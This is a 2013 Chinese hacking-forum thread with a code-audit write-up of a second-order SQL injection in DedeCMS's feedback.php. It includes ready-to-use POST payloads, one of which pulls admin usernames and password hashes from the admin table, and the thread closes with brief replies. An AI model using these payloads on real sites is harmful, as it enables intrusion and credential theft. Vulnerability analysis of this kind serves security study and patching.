【T00ls】DEDECMS 通杀鸡肋注入一枚

made · 发表于 2013-3-8 10:29:43

转T00ls的。

漏洞文件：/plus/feedback.php

if($comtype == 'comments') //问题从这里开始
{
$arctitle = addslashes($title);//$title 是关键没有初始化 addslashes转义了我们的$title 比如我们传入1' $arctitle=1\'
$typeid = intval($typeid); //这些都是打酱油的
$ischeck = intval($ischeck);//这些都是打酱油的
$feedbacktype = preg_replace("#[^0-9a-z]#i", "", $feedbacktype);
if($msg!='') //$msg 如果不为空继续往下走
{ $inquery = "INSERT INTO `#@__feedback`(`aid`,`typeid`,`username`,`arctitle`,`ip`,`ischeck`,`dtime`, `mid`,`bad`,`good`,`ftype`,`face`,`msg`) VALUES ('$aid','$typeid','$username','$arctitle','$ip','$ischeck','$dtime', '{$cfg_ml->M_ID}','0','0','$feedbacktype','$face','$msg'); "; //$arctitle 被带入到 $inquery 这个sql 语句中我们来看看效果

复制代码

1

2

继续看代码往下走

$rs = $dsql->ExecuteNoneQuery($inquery); //ExecuteNoneQuery发送sql 语句
//思考既然$inquery insert 到数据库后$arctitle 的值没有被转义我们应该想办法利用啊继续往下看
if(!$rs) //这些都是打酱油的
{
ShowMsg(' 发表评论错误! ', '-1');
exit();
}
}
}
//引用回复
elseif ($comtype == 'reply') //第二个关键
{
$row = $dsql->GetOne("SELECT * FROM `#@__feedback` WHERE id ='$fid'");//看这sql 语句
//SELECT * FROM `#@__feedback` WHERE id ='$fid' 查询的不就是我们刚刚insert的表么 $fid是get传过来的

复制代码

3

往下看

$arctitle = $row['arctitle']; //看到这里你激动了么直接取数据库里面arctitle 字段的值给$arctitle 看看$arctitle 被带入到哪里了
$aid =$row['aid'];//这些都是打酱油的
$msg = $quotemsg.$msg;//这些都是打酱油的
$msg = HtmlReplace($msg, 2);//这些都是打酱油的
$inquery = "INSERT INTO `#@__feedback`(`aid`,`typeid`,`username`,`arctitle`,`ip`,`ischeck`,`dtime`,`mid`,`bad`,`good`,`ftype`,`face`,`msg`)
VALUES ('$aid','$typeid','$username','$arctitle','$ip','$ischeck','$dtime','{$cfg_ml->M_ID}','0','0','$feedbacktype','$face','$msg')";
//$arctitle 被带入到 $inquery 这里我们构建下语句 echo $inquery 看看

复制代码

4

$dsql->ExecuteNoneQuery($inquery);//这里用ExecuteNoneQuery发送sql 语句我们看看这个函数吧
/*
* //执行一个不返回结果的SQL语句，如update,delete,insert等
function ExecuteNoneQuery($sql=''){...}
* 不返回结果的没办发报错我们只能构建其他的exp了
* 想法1：
* 我们在第一次insert的时候构建$arctitle=1,@`'`,1,1,1,1,1,1,1,(SELECT concat(uname,0x5f,pwd,0x5f) FROM `%23@__admin` limit 0,1)),(1,1,1,'1
* http://localhost/dede/uploads/plus/feedback.php
* post
* action=send&comtype=comments&aid=16&isconfirm=yes&feedbacktype=feedback&face=1&msg=33333&notuser=1&validate=gram&typeid=12&title=1,@`'`,1,1,1,1,1,1,1,(SELECT concat(uname,0x5f,pwd,0x5f) FROM `%23@__admin` limit 0,1)),(1,1,1,'1
*
* 然后在取出的时候第2条sql 语句应该就变成了：
* INSERT INTO `#@__feedback`(`aid`,`typeid`,`username`,`arctitle`,`ip`,`ischeck`,`dtime`,`mid`,`bad`,`good`,`ftype`,`face`,`msg`) VALUES ('16','0','游客 ','1,@`'`,1,1,1,1,1,1,1,(SELECT concat(uname,0x5f,pwd,0x5f) FROM `%23@__admin` limit 0,1)),(1,1,1,'1','127.0.0.1','1','1362649019','0','0','0','feedback','0','')

复制代码

/* 本次审计到这里结束了最后给出的exp是只能select user() 大牛们可以开拓思维想想有没别的招
* 第一次post的语句
* http://localhost/dede/uploads/plus/feedback.php
* post
* action=send&comtype=comments&aid=13&isconfirm=yes&feedbacktype=feedback&face=1&msg=22222&notuser=1&validate=gram&typeid=12&title=',@`'`,1,1,1,1,1,1,1,(SELECT user())),(1,
* 第2次post的语句 //aid 要和上面的一样 fid 前面有说
* http://localhost/dede/uploads/plus/feedback.php
* action=send&comtype=reply&aid=13&isconfirm=yes&feedbacktype=feedback&validate=upse&fid=9
*/

复制代码

90_ · 发表于 2013-3-8 10:31:44

确实鸡肋了点。
这个地方以前好像就出过注入

显示全部楼层 · 发表于 2013-3-8 10:37:48

提示: 作者被禁止或删除内容自动屏蔽

made · 发表于 2013-3-8 10:38:12

huc.雨发表于 2013-3-8 10:37
看不懂。

慢慢来~

显示全部楼层 · 发表于 2013-3-8 10:39:29

提示: 作者被禁止或删除内容自动屏蔽

made · 发表于 2013-3-8 10:40:30

huc.雨发表于 2013-3-8 10:39
要看得懂这些。要学什么语言？

我擦，肯定是php了，另外mysql也要知道点

显示全部楼层 · 发表于 2013-3-8 10:48:27

提示: 作者被禁止或删除内容自动屏蔽

Tom · 发表于 2013-3-8 11:07:06

提示: 作者被禁止或删除内容自动屏蔽

土豆 · 发表于 2013-3-8 11:12:54

以前好像看过~~~~~~ 继续学习~~~~~~~~

leehenwu · 发表于 2013-3-8 15:30:23

学习学习

huc.雨该用户已被删除	发表于 2013-3-8 10:37:48 \| 显示全部楼层提示: 作者被禁止或删除内容自动屏蔽
huc.雨该用户已被删除
	回复支持反对使用道具举报

huc.雨该用户已被删除	发表于 2013-3-8 10:39:29 \| 显示全部楼层提示: 作者被禁止或删除内容自动屏蔽
huc.雨该用户已被删除
	回复支持反对使用道具举报

huc.雨该用户已被删除	发表于 2013-3-8 10:48:27 \| 显示全部楼层提示: 作者被禁止或删除内容自动屏蔽
huc.雨该用户已被删除
	回复支持反对使用道具举报

Tom Tom 当前离线积分 33 头像被屏蔽该用户从未签到	发表于 2013-3-8 11:07:06 \| 显示全部楼层提示: 作者被禁止或删除内容自动屏蔽
Tom Tom 当前离线积分 33 头像被屏蔽该用户从未签到
	回复支持反对使用道具举报